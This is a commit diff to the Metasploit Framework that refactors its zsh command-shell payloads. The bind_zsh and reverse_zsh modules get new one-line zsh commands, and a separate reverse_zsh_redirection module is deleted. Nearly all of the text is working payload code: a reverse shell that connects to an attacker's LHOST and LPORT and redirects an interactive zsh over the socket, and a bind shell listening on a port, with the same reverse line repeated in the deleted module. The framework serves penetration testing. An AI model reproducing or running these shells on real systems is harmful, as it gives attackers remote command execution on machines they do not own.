Refactor zsh payloads

This also fixes an oversight where the payloads would fail outside zsh.

modules/payloads/singles/cmd/unix/bind_zsh.rb

@@ -23,7 +23,8 @@ module MetasploitModule
       },
       'Author'        =>
         [
-          'Doug Prostko <dougtko[at]gmail.com>'
+          'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
+          'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'unix',
@@ -44,18 +45,13 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
-    return super + command_string
+    super + command_string
   end
 
   #
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = "zmodload zsh/net/tcp;"
-    cmd << "ztcp -l #{datastore['LPORT']};"
-    cmd << "ztcp -a $REPLY;"
-    cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
-    cmd << "ztcp -c"
-    cmd
+    "zsh -c 'zmodload zsh/net/tcp && ztcp -l #{datastore['LPORT']} && ztcp -a $REPLY && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
   end
 end

modules/payloads/singles/cmd/unix/reverse_zsh.rb

@@ -21,7 +21,11 @@ module MetasploitModule
         Connect back and create a command shell via Zsh.  Note: Although Zsh is often
         available, please be aware it isn't usually installed by default.
       },
-      'Author'      => 'Doug Prostko <dougtko[at]gmail.com>',
+      'Author'      =>
+        [
+          'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
+          'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
+        ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'unix',
       'Arch'        => ARCH_CMD,
@@ -34,14 +38,10 @@ module MetasploitModule
   end
 
   def generate
-    return super + command_string
+    super + command_string
   end
 
   def command_string
-    cmd = "zmodload zsh/net/tcp;"
-    cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};"
-    cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
-    cmd << "ztcp -c"
-    cmd
+    "zsh -c 'zmodload zsh/net/tcp && ztcp #{datastore['LHOST']} #{datastore['LPORT']} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
   end
 end

modules/payloads/singles/cmd/unix/reverse_zsh_redirection.rb

@@ -1,44 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core/handler/reverse_tcp'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
-
-module MetasploitModule
-
-  CachedSize = 110
-
-  include Msf::Payload::Single
-  include Msf::Sessions::CommandShellOptions
-
-  def initialize(info = {})
-    super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via Zsh)',
-      'Description' => %q{
-        Connect back and create a command shell via Zsh by direction operations.  Note: Although Zsh is often
-        available, please be aware it isn't usually installed by default.
-      },
-      'Author'      => 'Wang Yihang <wangyihanger[at]gmail.com>',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'zsh',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
-    ))
-  end
-
-  def generate
-    return super + command_string
-  end
-
-  def command_string
-    # zmodload zsh/net/tcp && ztcp -d 9 127.0.0.1 8080 && zsh 1>&9 2>&9 0>&9
-    cmd = "zmodload zsh/net/tcp && ztcp -d 9 #{datastore['LHOST']} #{datastore['LPORT']} && zsh 1>&9 2>&9 0>&9"
-  end
-end